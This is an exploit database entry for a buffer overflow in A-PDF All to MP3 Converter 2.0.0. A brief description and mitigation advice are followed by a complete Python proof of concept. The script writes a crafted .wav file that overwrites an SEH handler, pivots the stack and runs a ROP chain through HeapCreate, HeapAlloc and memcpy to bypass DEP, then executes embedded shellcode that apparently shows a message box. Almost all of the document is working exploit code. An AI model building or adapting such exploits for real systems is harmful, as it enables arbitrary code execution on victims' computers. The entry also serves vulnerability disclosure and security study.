header-logo
Suggest Exploit
vendor:
All to MP3 Converter
by:
George Washington
6.1
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: All to MP3 Converter
Affected Version From: 2.0.0
Affected Version To: 2.0.0
Patch Exists: NO
Related CWE:
CPE: a-pdf_all_to_mp3_converter:2.0.0
Metasploit:
Other Scripts:
Platforms Tested: Windows 7 Ultimate 6.1.7601 SP1 Build 7601 x64
2023

A-PDF All to MP3 Converter 2.0.0 – DEP Bypass with HeapCreate + HeapAlloc + some_memory_copy_function ROP chain

The exploit leverages a buffer overflow vulnerability in A-PDF All to MP3 Converter version 2.0.0 to bypass Data Execution Prevention (DEP) using a ROP chain that includes HeapCreate, HeapAlloc, and a memory copy function. By crafting a malicious .wav file, an attacker can trigger the vulnerability and execute arbitrary code on the target system. This exploit was tested on Windows 7 Ultimate 6.1.7601 SP1 Build 7601 x64.

Mitigation:

To mitigate this vulnerability, users should refrain from opening untrusted .wav files from unknown or unverified sources. Additionally, keeping software up to date with the latest security patches can help prevent exploitation of known vulnerabilities.
Source

Exploit-DB raw data:

#!/usr/bin/python
# Exploit Title: A-PDF All to MP3 Converter 2.0.0 - DEP Bypass with HeapCreate + HeapAlloc + some_memory_copy_function ROP chain
# Date: 16 November 2023
# Exploit Author: George Washington
# Vendor Homepage: http://www.a-pdf.com/all-to-mp3/download.htm
# Software Link: http://www.a-pdf.com/all-to-mp3/download.htm
# Version: 2.0.0
# Tested on: Windows 7 Ultimate 6.1.7601 SP1 Build 7601 x64
# Based on: https://www.exploit-db.com/exploits/17275
# Remarks: There are some changes to the ROP gadgets obtained from Alltomp3.exe
# Video: https://youtu.be/_JEgdKjbtpI

import socket, struct

file = "1.wav"
size = 8000

############ Parameters for HeapCreate() ############
EXE = b"ZZZZ"                          # HeapCreate()
EXE += b"AAAA"                         # RET
EXE += struct.pack("<I", 0x00040000)   # Parameter 1 0x00040000
EXE += struct.pack("<I", 0x00000000)   # Parameter 2 0x00000000
EXE += struct.pack("<I", 0x00000000)   # Parameter 3 0x00000000
EXE += b"YYYY"                         # HeapAlloc()
EXE += b"BBBB"                         # RET
EXE += b"CCCC"                         # Parameter 1 hHandle
EXE += struct.pack("<I", 0x00000008)   # Parameter 2 0x00000008
EXE += struct.pack("<I", 0x00000500)   # Parameter 3 0x00000500
EXE += struct.pack("<I", 0x1002dd98)   # _memcpy_s()
EXE += b"DDDD"                         # heap pointer
EXE += b"EEEE"                         # heap pointer
EXE += struct.pack("<I", 0x00000500)   # size
EXE += b"GGGG"                         # shellcode pointer
EXE += struct.pack("<I", 0x00000500)   # size

junk = b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh"

#######################      STACK PIVOT      ###########################
SEH = struct.pack("<I", 0x005CE870) # 0x005CE870  add esp 0x800, 4 pops, ret [alltomp3.exe]

#######################    1. Get Stack Pointer to point to ZZZZ    ###########################
ROP = struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **
ROP += b"A" * 8 
ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** 
ROP += b"A" * 4
ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret  ;  (1 found)
ROP += struct.pack("<I", 0xffffff1c)
ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret  ;  (1 found)
ROP += struct.pack("<I", 0x41414141)*4
ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ;  (1 found)
ROP += b"A" * 4
# ecx points to ZZZZ

#######################    2. Get and set ZZZZ to HeapCreate        ###########################
ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret  ;  (1 found) [Module : lame_enc.dll]
ROP += b"A" * 0x10
ROP += struct.pack("<I", 0x1003D058) # HEAPCREATE IAT
ROP += struct.pack("<I", 0x10033344) # 0x10033344: mov eax, dword [eax] ; pop esi ; ret  ;  (1 found) [Module : lame_enc.dll]
ROP += struct.pack("<I", 0x41414141)
# eax has HeapCreate
ROP += struct.pack("<I", 0x1003303A) # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN 	[Module : lame_enc.dll]  ** 
ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret  ;  (1 found) [Module : lame_enc.dll]

#######################    3. Set RET                               ###########################
ROP += struct.pack("<I", 0x1003c452)  # 0x1003c452: pop eax ; ret  ;  (1 found)
ROP += struct.pack("<I", 0x1001939e)  # 0x1001939e: add esp, 0x000001A0 ; ret  ;  (1 found)
ROP += struct.pack("<I", 0x1003303A)  # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN 	[Module : lame_enc.dll]  ** 

#######################    4. Go to HeapCreate                      ###########################
ROP += struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **
ROP += b"A" * 8 
ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** 
ROP += b"A" * 4
ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret  ;  (1 found)
ROP += struct.pack("<I", 0xfffffea4)
ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret  ;  (1 found)
ROP += struct.pack("<I", 0x41414141)*4
ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret  ;  (1 found)
ROP += struct.pack("<I", 0x1002a3b5)*10 # 0x1002a3b5: ret  ;  (1 found) // pad it
# when heap create finishes, eax will have hHeap
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)

#######################    5. Get Stack Pointer to point to YYYY    ###########################
ROP += struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **
ROP += b"A" * 8 
ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** 
ROP += b"A" * 4
ROP += struct.pack("<I", 0x10004f62) # 0x10004f62: pop ebx ; ret  ;  (1 found)
ROP += struct.pack("<I", 0xfffffe58)
ROP += struct.pack("<I", 0x10007d44) # 0x10007d44: add eax, ebx ; pop ebx ; add esp, 0x08 ; ret  ;  (1 found)
ROP += struct.pack("<I", 0x41414141)*3
ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ;  (1 found)
ROP += b"A" * 4
# ecx points to YYYY

#######################    6. Get and set YYYY to HeapAlloc        ###########################
ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret  ;  (1 found) [Module : lame_enc.dll]
ROP += b"A" * 0x10
ROP += struct.pack("<I", 0x1003D014) # HEAPALLOC IAT
ROP += struct.pack("<I", 0x10033344) # 0x10033344: mov eax, dword [eax] ; pop esi ; ret  ;  (1 found) [Module : lame_enc.dll]
ROP += struct.pack("<I", 0x41414141)
# eax has HeapCreate
ROP += struct.pack("<I", 0x1003303A) # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN 	[Module : lame_enc.dll]  ** 
ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret  ;  (1 found) [Module : lame_enc.dll]

#######################    7. Set RET                               ###########################
ROP += struct.pack("<I", 0x1003c452)  # 0x1003c452: pop eax ; ret  ;  (1 found)
ROP += struct.pack("<I", 0x10014d32)  # 0x10014d32: add esp, 0x00000280 ; ret  ;  (1 found)
ROP += struct.pack("<I", 0x1003303A)  # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN 	[Module : lame_enc.dll]  ** 
ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret  ;  (1 found) [Module : lame_enc.dll]

#######################    8. Set hHEAP                             ###########################
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found) <- should return here and start executing here
ROP += struct.pack("<I", 0x1003303A) # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN 	[Module : lame_enc.dll]  ** 

#######################    9. Go to HeapAlloc                      ###########################
ROP += struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **
ROP += b"A" * 8 
ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** 
ROP += b"A" * 4
ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret  ;  (1 found)
ROP += struct.pack("<I", 0xfffffdcc)
ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret  ;  (1 found)
ROP += struct.pack("<I", 0x41414141)*4
ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret  ;  (1 found)
# when heap create finishes, eax will have hHeap
ROP += struct.pack("<I", 0x1002a3b5)*20 # 0x1002a3b5: ret  ;  (1 found) // pad it
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)

#######################    10. Get Stack Pointer to point to DDDD   ###########################
ROP += struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **
ROP += b"A" * 8 
ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** 
ROP += b"A" * 4
ROP += struct.pack("<I", 0x10004f62) # 0x10004f62: pop ebx ; ret  ;  (1 found)
ROP += struct.pack("<I", 0xfffffd5c)
ROP += struct.pack("<I", 0x10007d44) # 0x10007d44: add eax, ebx ; pop ebx ; add esp, 0x08 ; ret  ;  (1 found)
ROP += struct.pack("<I", 0x41414141)*3
ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ;  (1 found)
ROP += b"A" * 4
# ecx points to DDDD

#######################    12. Set RET                              ###########################
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)
ROP += b"A"*0x10
ROP += struct.pack("<I", 0x1003303A) # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN 	[Module : lame_enc.dll]  ** 
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)
ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret  ;  (1 found) [Module : lame_enc.dll]

#######################    13. DESTIN                                ###########################
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)
ROP += struct.pack("<I", 0x1003303A) # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN 	[Module : lame_enc.dll]  ** 
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)
ROP += struct.pack("<I", 0x100345ee)*8 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret  ;  (1 found) [Module : lame_enc.dll]* 

#######################    14. SOURCE                                ###########################
ROP += struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **
ROP += b"A" * 8 
ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** 
ROP += b"A" * 4
ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret  ;  (1 found)
ROP += struct.pack("<I", 0x000000a0)
ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret  ;  (1 found)
ROP += struct.pack("<I", 0x41414141)*4
ROP += struct.pack("<I", 0x1003303A) # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN 	[Module : lame_enc.dll]  ** 
ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)

#######################    15. GOTO _memcpy_s                        ###########################
ROP += struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **
ROP += b"A" * 8 
ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** 
ROP += b"A" * 4
ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret  ;  (1 found)
ROP += struct.pack("<I", 0xfffffc94)
ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret  ;  (1 found)
ROP += struct.pack("<I", 0x41414141)*4
ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret  ;  (1 found)

#######################  SHELLCODE  ###########################
shellcode = b"\xcc" * 400
real_shellcode = b"\x33\xc9\x64\x8b\x49\x30\x8b\x49\x0c\x8b"
real_shellcode += b"\x49\x1c\x8b\x59\x08\x8b\x41\x20\x8b\x09"
real_shellcode += b"\x80\x78\x0c\x33\x75\xf2\x8b\xeb\x03\x6d"
real_shellcode += b"\x3c\x8b\x6d\x78\x03\xeb\x8b\x45\x20\x03"
real_shellcode += b"\xc3\x33\xd2\x8b\x34\x90\x03\xf3\x42\x81"
real_shellcode += b"\x3e\x47\x65\x74\x50\x75\xf2\x81\x7e\x04"
real_shellcode += b"\x72\x6f\x63\x41\x75\xe9\x8b\x75\x24\x03"
real_shellcode += b"\xf3\x66\x8b\x14\x56\x8b\x75\x1c\x03\xf3"
real_shellcode += b"\x8b\x74\x96\xfc\x03\xf3\x33\xff\x57\x68"
real_shellcode += b"\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68"
real_shellcode += b"\x4c\x6f\x61\x64\x54\x53\xff\xd6\x33\xc9"
real_shellcode += b"\x57\x66\xb9\x33\x32\x51\x68\x75\x73\x65"
real_shellcode += b"\x72\x54\xff\xd0\x57\x68\x6f\x78\x41\x01"
real_shellcode += b"\xfe\x4c\x24\x03\x68\x61\x67\x65\x42\x68"
real_shellcode += b"\x4d\x65\x73\x73\x54\x50\xff\xd6\x57\x68"
real_shellcode += b"\x72\x6c\x64\x21\x68\x6f\x20\x57\x6f\x68"
real_shellcode += b"\x48\x65\x6c\x6c\x8b\xcc\x57\x57\x51\x57"
real_shellcode += b"\xff\xd0\x57\x68\x65\x73\x73\x01\xfe\x4c"
real_shellcode += b"\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78"
real_shellcode += b"\x69\x74\x54\x53\xff\xd6\x57\xff\xd0"

#######################  CONSTRUCT  ###########################
SIZE = 500
start_of_padding = b"A" * (SIZE-len(EXE)-len(shellcode))
start_of_padding += shellcode
start_of_padding += EXE

SIZE = 1500
RET_NOP_TO_ROP = b"A" * 0x70 + struct.pack("I", 0x1003c6aa) * 10 # RET
#INT = struct.pack("I", 0x1000f2b3) + b"BBBB" # 0x1000f2b3: int3  ; pop esi ; ret  ;  (1 found)
INT = struct.pack("I", 0x1003c6aa)*2

rest_of_payload = RET_NOP_TO_ROP + INT + ROP # 160 + 14*4 + 172
rest_of_payload += b"\x90" * 100
rest_of_payload += real_shellcode
rest_of_payload += b"\x90" * (SIZE-len(rest_of_payload))

payload = junk + SEH + start_of_padding + rest_of_payload

REST = b"\x44" * (size-len(payload))
payload += REST

file = open("1.wav", "wb")
file.write(payload)
file.close()